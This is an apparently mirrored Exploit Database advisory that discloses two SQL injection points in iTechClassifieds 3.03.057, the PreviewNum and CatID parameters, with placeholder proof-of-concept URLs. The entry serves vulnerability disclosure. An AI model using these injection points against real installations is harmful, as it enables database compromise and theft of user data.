iTechClassifieds 3.03.057 – SQL Injection

• Exploit Database
• 37 阅读

• 作者： vinicius777
  日期： 2014-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/31140/

• # Exploit Title: iTechClassifieds v3.03.057 - SQL Injection
  # Date: 23/01/2014
  # Exploit Author: vinicius777
  # Vendor Homepage: http://itechscripts.com/download.html
  # Software Link: http://itechscripts.com/downloads/download_itechclassifieds.html
  # Version: 3.03.057
  
  
  [1] SQL Injection - PreviewNun 
  
  PoC: http://localhost/iTechClassifieds_v3/ChangeEmail.php?PreviewNum=1' [SQL INJECTION]
  
  
  
  [2] SQL Injection - CatID
  
  PoC: http://localhost/iTechClassifieds_v3/ViewCat.php?CatID=[SQL INJECTION]
  
  
  #
  #
  # Greetz to g0tm1lk and TheColonial.